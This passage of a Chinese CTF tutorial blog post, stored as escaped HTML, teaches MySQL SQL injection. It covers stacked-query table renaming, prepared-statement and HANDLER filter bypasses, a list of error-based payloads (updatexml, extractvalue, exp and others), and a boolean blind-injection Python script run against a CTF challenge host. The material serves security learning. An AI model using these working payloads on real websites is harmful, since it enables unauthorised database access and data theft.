class=\"wp-block-heading\">\u6539\u76ee\u6807\u540d<\/h2>\n\n\n\n<p>\u8fd9\u9053\u9898select\u88ab\u8fc7\u6ee4\u4e86\uff0c\u610f\u5473\u7740\u8fd9\u9053\u9898\u65e0\u6cd5\u8054\u5408\uff08union\uff09\u6ce8\u5165\uff0c\u800c\u5b83\u7684\u5185\u90e8\u67e5\u8be2\u8bed\u53e5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id,data from word where id =<\/code><\/pre>\n\n\n\n<p>\u7f51\u9875\u7684\u56de\u663e\u90fd\u662fwords\u8fd9\u4e2a\u8868\u7ed9\u7684\u56de\u663e\uff0c\u800c\u6211\u4eec\u7684flag\u653e\u5728\u6570\u5b57\u8868\u91cc\uff0c\u90a3\u4e48\u6211\u4eec\u9700\u8981\u8ba9\u6570\u5b57\u8868\u56de\u663e\u51fa\u6765flag\u4e86\uff0c\u8fd9\u65f6\u76f4\u63a5\u5806\u53e0\u6ce8\u5165\u53ea\u4f1a\u6709words\u8868\u7684\u56de\u663e\uff0c\u8fd9\u91cc\u7684\u89e3\u51b3\u529e\u6cd5\u4fbf\u662f\u628a\u6570\u5b57\u8868\u6539\u4e3awords\u8868\u540d\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1.\u5148\u5bf9words\u8fdb\u884c\u6539\u8868\u540d\u9632\u6b62\u91cd\u540d\uff1arename table `words` to `word`;\n2.\u5c06\u6570\u5b57\u8868\u6539\u4e3awords\u8868\u540d(\u5728\u7a97\u53e3\u56de\u663e\u5185\u5bb9)\uff1arename table `1919810931114514` to `words`;\n3.\u6211\u4eec\u67e5\u8868\u7ed3\u6784\u65f6\u770b\u5230words\u91cc\u6709\u4e24\u4e2a\u5b57\u6bb5id\u5217\u548c\u6570\u636edata,\u4f46\u6570\u5b57\u8868\u6ca1\u6709id\uff0c\u6240\u4ee5\u6211\u4eec\u628aflag\u6362\u6210id\uff1aalter table `words` change `flag` `id` varchar(100);<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u4fee\u6539flag\u4e3aid\u76f4\u63a5\u5806\u53e0\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u7528\u4e07\u80fd\u5bc6\u7801\u5373\u53ef\u663e\u793a\u51fa\u8868\u91cc\u7684\u6240\u6709\u6570\u636e\uff0c\u81ea\u7136\u4e5f\u5305\u62ecflag\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9884\u5904\u7406<\/h2>\n\n\n\n<p>\u5f53\u7136\u9664\u4e86\u8fd9\u79cd\u65b9\u6cd5\u8fd8\u53ef\u4ee5\u4f7f\u7528<strong>\u9884\u5904\u7406<\/strong>\u89e3\u51b3\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1'; Set @a=concat(\"sele\",\"ct flag from `1919810931114514`\");prepare h from @a;execute h;<\/code><\/pre>\n\n\n\n<p>\u9884\u5904\u7406\u57fa\u4e8e\u4e09\u4e2aSQL\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PREPARE stmt_name FROM preparable_stmt;\nEXECUTE stmt_name &#91;USING @var_name &#91;, @var_name] ...];\n{DEALLOCATE | DROP} PREPARE stmt_name;<\/code><\/pre>\n\n\n\n<p>PREPARE\u8bed\u53e5\u7528\u4e8e\u9884\u5907\u4e00\u4e2a\u8bed\u53e5\uff0c\u5e76\u8d4b\u4e88\u5b83\u540d\u79f0stmt_name\uff0c\u501f\u6b64\u5728\u4ee5\u540e\u5f15\u7528\u8be5\u8bed\u53e5\u3002\u8bed\u53e5\u540d\u79f0\u5bf9\u6848\u4f8b\u4e0d\u654f\u611f\u3002preparable_stmt\u53ef\u4ee5\u662f\u4e00\u4e2a\u6587\u5b57\u5b57\u7b26\u4e32\uff0c\u4e5f\u53ef\u4ee5\u662f\u4e00\u4e2a\u5305\u542b\u4e86\u8bed\u53e5\u6587\u672c\u7684\u7528\u6237\u53d8\u91cf\u3002\u8be5\u6587\u672c\u5fc5\u987b\u5c55\u73b0\u4e00\u4e2a\u5355\u4e00\u7684SQL\u8bed\u53e5\uff0c\u800c\u4e0d\u662f\u591a\u4e2a\u8bed\u53e5\u3002\u4f7f\u7528\u672c\u8bed\u53e5\uff0c\u2018?\u2019\u5b57\u7b26\u53ef\u4ee5\u88ab\u7528\u4e8e\u5236\u4f5c\u53c2\u6570\uff0c\u4ee5\u6307\u793a\u5f53\u60a8\u6267\u884c\u67e5\u8be2\u65f6\uff0c\u6570\u636e\u503c\u5728\u54ea\u91cc\u4e0e\u67e5\u8be2\u7ed3\u5408\u5728\u4e00\u8d77\u3002\u2018?\u2019\u5b57\u7b26\u4e0d\u5e94\u52a0\u5f15\u53f7\uff0c\u5373\u4f7f\u60a8\u60f3\u8981\u628a\u5b83\u4eec\u4e0e\u5b57\u7b26\u4e32\u503c\u7ed3\u5408\u5728\u4e00\u8d77\uff0c\u4e5f\u4e0d\u8981\u52a0\u5f15\u53f7\u3002\u53c2\u6570\u5236\u4f5c\u7b26\u53ea\u80fd\u88ab\u7528\u4e8e\u6570\u636e\u503c\u5e94\u8be5\u51fa\u73b0\u7684\u5730\u65b9\uff0c\u4e0d\u7528\u4e8eSQL\u5173\u952e\u8bcd\u548c\u6807\u8bc6\u7b26\u7b49\u3002<\/p>\n\n\n\n<p>\u5f53\u7136\u6211\u4eec\u53ea\u7528\u638c\u63e1\u5b83\u7684\u8fd0\u7528\u5373\u53ef\uff0c\u5373\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Set @a='\u8bed\u53e5';prepare h from @a;execute h;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528handler\u51fd\u6570<\/h2>\n\n\n\n<p>\u4e0d\u8fc7\u8fd9\u4e2a\u9898\u8fd8\u53ef\u4ee5\u62d3\u5c55\u4e00\u4e0b\uff0c\u90a3\u5c31\u662f\u5982\u679c\u8fd9\u9053\u9898\u589e\u52a0\u4e86\u8fc7\u6ee4\uff08 select\uff0cset\uff0cprepare\uff0crename\uff09\u600e\u4e48\u529e\u5462\uff1f\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u5229\u7528handler\u51fd\u6570\uff0c\u4ed6\u53ef\u4ee5\u5728\u4e0d\u77e5\u9053\u5b57\u6bb5\u540d\u7684\u524d\u63d0\u4e0b\u67e5\u8be2\u51fa\u5b57\u6bb5\u7684\u503c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';handler `1919810931114514` open as aaa;handler aaa read first;<\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d\u7684aaa\u4e3a\u6211\u4eec\u81ea\u5df1\u5b9a\u4e49\u7684\u540d\u5b57\uff0cfirst\u4e3a\u8bfb\u7b2c\u4e00\u884c\u6570\u636e\uff0c\u4e0e\u4ed6\u5e76\u5217\u7684\u8fd8\u6709next\uff08\u8bfb\u53d6\u4e0b\u4e00\u884c)\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528handler \u8bfb\u53d6\u6570\u636e \u8fd9\u4e2ahandler\u53ea\u80fd\u4e00\u884c\u4e00\u884c\u7684\u8bfb\u53d6\u4f7f\u7528read first\u3001next\u3001prev\u3001last\u7b49\u51fd\u6570\u53bb\u8bfb\u53d6\uff0c\u7528\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1.\u6253\u5f00\u8868\nhandler table_name open\n2.\u8bfb\u53d6\u7b2c\u4e00\u884c\nhandler table_name read first\u6216\u8005(next)\n3.\u5173\u95ed\u8868\nhandler table_name close<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u5176\u5b9e\u5bf9\u4e8e\u8fd9\u9053\u9898\u4e5f\u53ef\u4ee5\u4e0d\u53d6\u522b\u540d\u76f4\u63a5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>';handler `1919810931114514` open;handler `1919810931114514` read next;--+<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">\u62a5\u9519\u6ce8\u5165<\/h1>\n\n\n\n<p>\u901a\u8fc7<strong>\u7279\u6b8a\u51fd\u6570<\/strong>\u7684\u9519\u8bef\u4f7f\u7528\u4f7f\u5176\u53c2\u6570\u88ab\u9875\u9762\u8f93\u51fa\uff0c\u6709\u70b9\u50cfSSTI\u3002\u5f53\u7136\uff0c\u8fd9\u79cd\u6ce8\u5165\u53ef\u4ee5\u6210\u529f\u7684\u524d\u63d0\u662f\u670d\u52a1\u5668\u5f00\u542f\u62a5\u9519\u4fe1\u606f\u8fd4\u56de\uff0c\u4e5f\u5c31\u662f\u53d1\u751f\u9519\u8bef\u65f6\u8fd4\u56de\u62a5\u9519\u4fe1\u606f\uff0c\u5e38\u89c1\u7684\u5229\u7528\u51fd\u6570\u6709\u5e38\u89c1\u7684\u5229\u7528\u51fd\u6570\u6709\uff1a<code>exp()\u3001floor()+rand()\u3001updatexml()\u3001extractvalue()<\/code>\u7b49\uff0c\u53c2\u8003<a href=\"https:\/\/xz.aliyun.com\/t\/2869#toc-25\">SQL \u6ce8\u5165\u603b\u7ed3<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>1.floor()\u548crand()<\/strong>\nunion select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a       \/*\u5229\u7528\u9519\u8bef\u4fe1\u606f\u5f97\u5230\u5f53\u524d\u6570\u636e\u5e93\u540d*\/\n<strong>2.extractvalue()<\/strong>\nid=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))\n<strong>3.updatexml()<\/strong>\nid=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))\n<strong>4.geometrycollection()<\/strong>\nid=1 and geometrycollection((select * from(select * from(select user())a)b))\n<strong>5.multipoint()<\/strong>\nid=1 and multipoint((select * from(select * from(select user())a)b))\n<strong>6.polygon()<\/strong>\nid=1 and polygon((select * from(select * from(select user())a)b))\n<strong>7.multipolygon()<\/strong>\nid=1 and multipolygon((select * from(select * from(select user())a)b))\n<strong>8.linestring()<\/strong>\nid=1 and linestring((select * from(select * from(select user())a)b)\n<strong>9.multilinestring()<\/strong>\nid=1 and multilinestring((select * from(select * from(select user())a)b))\n<strong>10.exp()<\/strong>\nid=1 and exp(~(select * from(select user())a))<\/code><\/pre>\n\n\n\n<p>\u5c06\u4e0a\u8ff0payload\u7684(select user())\u5f53\u505a\u8054\u5408\u67e5\u8be2\u6cd5\u7684\u6ce8\u5165\u4f4d\u7f6e\uff0c\u63a5\u4e0b\u6765\u7684\u64cd\u4f5c\u4e0e\u8054\u5408\u67e5\u8be2\u6cd5\u4e00\u6837\uff0c\u4e0d\u8fc7\u503c\u5f97\u6ce8\u610f\u7684\u662f\u62a5\u9519\u51fd\u6570\u901a\u5e38\u5c24\u5176\u6700\u957f\u62a5\u9519\u8f93\u51fa\u7684\u9650\u5236\uff0c\u9762\u5bf9\u8fd9\u79cd\u60c5\u51b5\uff0c\u53ef\u4ee5\u8fdb\u884c\u5206\u5272\u8f93\u51fa\uff0c\u6709\u65f6\u5019\u7279\u6b8a\u51fd\u6570\u7684\u7279\u6b8a\u53c2\u6570\u8fdb\u8fd0\u884c\u4e00\u4e2a\u5b57\u6bb5\u3001\u4e00\u884c\u6570\u636e\u7684\u8fd4\u56de\uff0c\u4f7f\u7528group_concat\u7b49\u51fd\u6570\u805a\u5408\u6570\u636e\u5373\u53ef\uff0c\u4ee5newstarctf\u7b2c\u4e8c\u5468\u7684Word-For-You(2 Gen)\u4e3a\u4f8b\uff0c\u8fd9\u91cc\u6211\u4eec\u4f7f\u7528updatexml()\u8fdb\u884c\u62a5\u9519\u6ce8\u5165\uff1a<\/p>\n\n\n\n<p><strong>\u7206\u5e93\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT database())),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u6570\u636e\u5e93wfy<\/p>\n\n\n\n<p><strong>\u7206\u8868\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u8868\u540d\uff1awfy_admin,wfy_comments,wfy_info<\/p>\n\n\n\n<p><strong>\u67e5\u770bwfy_comments\u8868\u5217\u540d\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(column_name) from information_schema.columns where table_name='wfy_comments')),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5217\u540d\uff1aid,text,user,name,display<\/p>\n\n\n\n<p><strong>\u67e5\u6570\u636e<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(text) from wfy_comments)),1)--+<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u53ef\u4ee5\u5f97\u5230\u4e00\u90e8\u5206\u7684\u6570\u636e\uff0c\u4f46\u662f\u56e0\u4e3a\u62a5\u9519\u51fd\u6570\u9650\u5236\u957f\u5ea6\uff0c\u6211\u4eec\u53ea\u80fd\u4e00\u6b65\u4e00\u6b65\u7684\u622a\u53d6\u8f93\u51fa\uff0c\u6bd4\u5982\u4f7f\u7528substr()\u51fd\u6570\uff0c\u4f7f\u7528payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat('^',( select substr(group_concat(text),155,172) from wfy_comments),'^'),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\u4e5f\u53ef\u4ee5\u4f7f\u7528limit\uff0c\u5229\u7528limit\u8fdb\u884c\u5206\u9875\uff0c\u4f5c\u7528\u662f\u5c55\u793a\u7b2c\u51e0\u6761\u6570\u636e\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat('^',( select text from wfy_comments limit 5,1),'^'),1)--+<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\u7f3a\u70b9\u662f\u6709\u7684\u662f\u957f\u5ea6\u6709\u9650\u5236\u7684\u8bdd\u8fd8\u662f\u663e\u793a\u4e0d\u51fa\u6765\uff0c\u6bd4\u5982\u8fd9\u4e2a\u9898\u4ed6\u5c31\u663e\u4e0d\u51fa\u6765flag\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">mysql\u5217\u540d\u91cd\u590d\u62a5\u9519<\/h2>\n\n\n\n<p>\u5185\u5bb9\u90fd\u6284\u7684S<a href=\"https:\/\/xz.aliyun.com\/t\/2869#toc-20\">QL\u6ce8\u5165\u6709\u8da3\u59ff\u52bf\u603b\u7ed3<\/a>\uff1a<\/p>\n\n\n\n<p>\u5728mysql\u4e2d\uff0cmysql\u5217\u540d\u91cd\u590d\u4f1a\u5bfc\u81f4\u62a5\u9519\uff0c\u800c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7name_const\u5236\u9020\u4e00\u4e2a\u5217.<br>Name_const\u51fd\u6570\u7528\u6cd5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select name_const(version(),1);\n+--------+\n| 5.5.47 |\n+--------+\n|      1 |\n+--------+\n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u62a5\u9519\u7528\u6cd5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select name_const(version(),1),name_const(version(),1);;\n+--------+--------+\n| 5.5.47 | 5.5.47 |\n+--------+--------+\n|      1 |      1 |\n+--------+--------+\n1 row in set (0.00 sec)\n\nERROR:\nNo query specified\n\nmysql&gt; select * from (select name_const(version(),1),name_const(version(),1))x;\nERROR 1060 (42S21): Duplicate column name '5.5.47'<\/code><\/pre>\n\n\n\n<p>\u4e0d\u8fc7\u8fd9\u4e2a\u6709\u5f88\u5927\u7684\u9650\u5236\uff0c<code>version()<\/code>\u6240\u5bf9\u5e94\u7684\u503c\u5fc5\u987b\u662f\u5e38\u91cf\uff0c\u800c\u6211\u4eec\u6240\u9700\u8981\u7684<code>database()<\/code>\u548c<code>user()<\/code>\u90fd\u662f\u53d8\u91cf\uff0c\u65e0\u6cd5\u901a\u8fc7\u62a5\u9519\u5f97\u51fa\uff0c\u4f46\u662f\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u539f\u7406\u914d\u5408join\u51fd\u6570\u5f97\u5230\u5217\u540d\u3002\u7528\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select * from ctf_test a join ctf_test b;\n+------+--------------+------+--------------+\n| user | pwd          | user | pwd          |\n+------+--------------+------+--------------+\n| 1    | 0            | 1    | 0            |\n| 2    | flag{OK_t72} | 1    | 0            |\n| 1    | 0            | 2    | flag{OK_t72} |\n| 2    | flag{OK_t72} | 2    | flag{OK_t72} |\n+------+--------------+------+--------------+\n4 rows in set (0.00 sec)\n\nmysql&gt; select * from (select * from ctf_test a join ctf_test b )x;\nERROR 1060 (42S21): Duplicate column name 'user'\nmysql&gt; select * from (select * from ctf_test a join ctf_test b using(user))x;\nERROR 1060 (42S21): Duplicate column name 'pwd'\nmysql&gt; select * from (select * from ctf_test a join ctf_test b using(user,pwd))x;\n+------+--------------+\n| user | pwd          |\n+------+--------------+\n| 1    | 0            |\n| 2    | flag{OK_t72} |\n+------+--------------+\n2 rows in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u4eb2\u6d4b\u53ef\u884c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-12.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"691\" height=\"298\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-12.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1415\"  sizes=\"auto, (max-width: 691px) 100vw, 691px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b80\u5355\u89e3\u91ca\u4e00\u4e0b\u8fd9\u53e5\u8bdd\u5565\u610f\u601d\uff0c\u8fd9\u662f\u4e00\u6761 SQL \u8bed\u53e5\uff0c\u5176\u4e3b\u8981\u4f5c\u7528\u662f\u5c06\u8868 <code>sheet1<\/code> \u4e2d\u6240\u6709\u7528\u6237\u540d\u548c\u5bc6\u7801\u76f8\u540c\u7684\u6570\u636e\u884c\u8fde\u63a5\u8d77\u6765\uff0c\u5e76\u8f93\u51fa\u6240\u6709\u7684\u5217\u4fe1\u606f\u3002\u8be5\u8bed\u53e5\u4e3b\u8981\u7531\u4ee5\u4e0b\u51e0\u90e8\u5206\u7ec4\u6210\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>select *<\/code>: \u8868\u793a\u9009\u53d6\u6240\u6709\u7684\u5217\u3002<\/li>\n\n\n\n<li><code>sheet1 a<\/code>: \u8868\u793a\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u6570\u636e\uff0c\u5e76\u4f7f\u7528\u522b\u540d <code>a<\/code> \u8868\u793a\u3002<\/li>\n\n\n\n<li><code>join<\/code>: \u8868\u793a\u8fde\u63a5\u64cd\u4f5c\u3002<\/li>\n\n\n\n<li><code>sheet1 b<\/code>: \u8868\u793a\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u6570\u636e\uff0c\u5e76\u4f7f\u7528\u522b\u540d <code>b<\/code> \u8868\u793a\u3002<\/li>\n\n\n\n<li><code>using(\u7528\u6237\u540d,\u5bc6\u7801)<\/code>: \u8868\u793a\u53ea\u8fde\u63a5 <code>sheet1<\/code> \u8868\u4e2d\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\u5217\u3002<\/li>\n\n\n\n<li><code>select * from (...)x<\/code>: \u8868\u793a\u5c06\u4e0a\u8ff0\u8fde\u63a5\u3001\u7b5b\u9009\u540e\u7684\u7ed3\u679c\u4fdd\u5b58\u4e3a\u4e00\u4e2a\u4e34\u65f6\u8868 <code>x<\/code>\uff0c\u5e76\u8f93\u51fa\u8be5\u8868\u7684\u6240\u6709\u5217\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u8fd9\u6761 SQL \u8bed\u53e5\u7684\u5177\u4f53\u542b\u4e49\u662f\uff0c\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u7528\u6237\u540d\u548c\u5bc6\u7801\u76f8\u540c\u7684\u6570\u636e\u884c\uff0c\u5e76\u5c06\u5b83\u4eec\u7684\u5176\u4ed6\u5217\u4fe1\u606f\u8fdb\u884c\u5408\u5e76\uff0c\u6700\u7ec8\u8f93\u51fa\u6240\u6709\u5217\u4fe1\u606f\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u76f2\u6ce8<\/h1>\n\n\n\n<p>\u6838\u5fc3\uff1a\u5229\u7528<strong>\u903b\u8f91\u4ee3\u6570\u8fde\u63a5\u8bcd\/\u6761\u4ef6\u51fd\u6570<\/strong>\uff0c\u8ba9\u9875\u9762<strong>\u8fd4\u56de\u7684\u5185\u5bb9\/\u54cd\u5e94\u65f6\u95f4<\/strong>\u4e0e\u6b63\u5e38\u7684\u9875\u9762\u4e0d\u7b26\uff0c\u7136\u540e\u901a\u8fc7\u5b57\u7b26\u4e00\u4f4d\u4e00\u4f4d\u5339\u914d\u6240\u9700\u8981\u7684\u540d\u79f0\u3002<\/p>\n\n\n\n<p>\u5e38\u89c1\u7684\u51fd\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>length(str) \uff1a\u8fd4\u56de\u5b57\u7b26\u4e32str\u7684\u957f\u5ea6\nsubstr(str, pos, len) \uff1a\u5c06str\u4ecepos\u4f4d\u7f6e\u5f00\u59cb\u622a\u53d6len\u957f\u5ea6\u7684\u5b57\u7b26\u8fdb\u884c\u8fd4\u56de\u3002\u6ce8\u610f\u8fd9\u91cc\u7684pos\u4f4d\u7f6e\u662f\u4ece1\u5f00\u59cb\u7684\uff0c\u4e0d\u662f\u6570\u7ec4\u76840\u5f00\u59cb\nmid(str,pos,len) \uff1a\u8ddf\u4e0a\u9762\u7684\u4e00\u6837\uff0c\u622a\u53d6\u5b57\u7b26\u4e32\nascii(str) \uff1a\u8fd4\u56de\u5b57\u7b26\u4e32str\u7684\u6700\u5de6\u9762\u5b57\u7b26\u7684ASCII\u4ee3\u7801\u503c\nord(str) \uff1a\u5c06\u5b57\u7b26\u6216\u5e03\u5c14\u7c7b\u578b\u8f6c\u6210ascll\u7801\nif(a,b,c) \uff1aa\u4e3a\u6761\u4ef6\uff0ca\u4e3atrue\uff0c\u8fd4\u56deb\uff0c\u5426\u5219\u8fd4\u56dec\uff0c\u5982if(1&gt;2,1,0),\u8fd4\u56de0<\/code><\/pre>\n\n\n\n<p>\u5e38\u5e38\u5229\u7528<strong>and or ||<\/strong> <strong>&amp;&amp;<\/strong>\u4f5c\u4e3a\u62fc\u63a5\u6761\u4ef6\u7684\u8bed\u53e5\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1 &amp;&amp; length( database() )&gt;1 --+\n?id<span class=\"token operator\">=1<\/span> <span class=\"token operator\">and<\/span> length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span>\n?id<span class=\"token operator\">=-1<\/span> || length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span>\n?id<span class=\"token operator\">=-1<\/span> or length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5e03\u5c14\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u8fdb\u884c\u5e03\u5c14\u76f2\u6ce8\u7684\u6761\u4ef6\u662f\u9875\u9762\u4f1a\u6709\u56de\u663e\u4f5c\u4e3a\u8bed\u53e5\u6267\u884c\u662f\u5426\u6210\u529f\u7684\u6807\u5fd7\uff0c\u4e00\u822c\u6211\u4eec\u53ef\u4ee5\u5148\u7528\u6c38\u771f\u6761\u4ef6<code>or 1=1<\/code>\u4e0e\u6c38\u5047\u6761\u4ef6<code>and 1=2<\/code>\u7684\u8fd4\u56de\u5185\u5bb9\u662f\u5426\u5b58\u5728\u5dee\u5f02\u8fdb\u884c\u5224\u65ad\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u5e03\u5c14\u76f2\u6ce8\uff0c\u5177\u4f53\u8bed\u53e5\u4e0e\u8054\u5408\u6ce8\u5165\u7c7b\u4f3c\uff0c\u4ee5newstarctf week4\u7684\u53c8\u4e00\u4e2aSQL\u4e3a\u4f8b\uff0c\u811a\u672c\u53c2\u8003<a href=\"https:\/\/forum.butian.net\/share\/1961\">NewStarCTF-Week3&amp;4\u7684WEB\u9898\u76ee\u8be6\u89e3<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\nimport time\natt=string.digits+string.ascii_letters+'}{-$_.^,'\n# print(att)\n\nflag=''\n\nurl='http:\/\/eedea255-193b-45f8-b87f-de7ee7324fa8.node4.buuoj.cn:81\/comments.php?name='\nfor i in range(1,50):\n    for a in att:\n        # payload='0\/***\/or\/***\/(substr(database(),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(table_name)\/***\/from\/***\/information_schema.tables\/***\/where\/***\/table_schema=database()),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(column_name)\/***\/from\/***\/information_schema.columns\/***\/where\/***\/table_schema=database()\/***\/and\/***\/table_name=\"wfy_admin\"),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(column_name)\/***\/from\/***\/information_schema.columns\/***\/where\/***\/table_schema=database()\/***\/and\/***\/table_name=\"wfy_comments\"),{},1)=\"{}\")'.format(i,a)\n        payload='0\/***\/or\/***\/(substr((select\/***\/text\/***\/from\/***\/`wfy_comments`\/***\/where\/***\/id=100),{},1)\/***\/like\/***\/binary\/***\/\"{}\")'.format(i,a)\n        res=requests.get(url=url+payload)\n        time.sleep(0.1)\n        if \"\u597d\u8036\uff01\u4f60\u6709\u8fd9\u6761\u6765\u81ea\u6761\u7559\u8a00\" in res.text:\n            flag+=a\n            print(flag)\n            break\n\nprint(flag)\n#wfy\n#wfy_admin,wfy_comments,wfy_information\n#wfy_admin:id,username,password,cookie\n#wfy_comments:id,text,user,name,display\n#flag{We_0nly_have_2wo_choices}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u4f7f\u7528\/**\/\u4ee3\u66ff\u7a7a\u683c\uff0c\u524d\u9762\u7684\u8bed\u53e5\u90fd\u548c\u4e4b\u524dunion\u6ce8\u5165\u5dee\u4e0d\u591a\uff0c\u53ea\u6709\u6700\u540e\u4e00\u53e5\u7a0d\u6709\u4e0d\u540c\uff0c\u6211\u4eec\u4f7f\u7528\u7684\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>0\/***\/or\/***\/(substr((select\/***\/text\/***\/from\/***\/`wfy_comments`\/***\/where\/***\/id=100),{},1)\/***\/like\/***\/binary\/***\/\"{}\")<\/code><\/pre>\n\n\n\n<p>\u5373<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>0 or (substr((select text from `wfy_comments ` where id=100),{},1) like binary \"{}\")<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7substr\u4e00\u4f4d\u4e00\u4f4d\u622a\u53d6(select text from `wfy_comments ` where id=100)\u7684\u503c\uff0c\u901a\u8fc7like binary\u5339\u914d\u5b57\u7b26\uff0cbinary 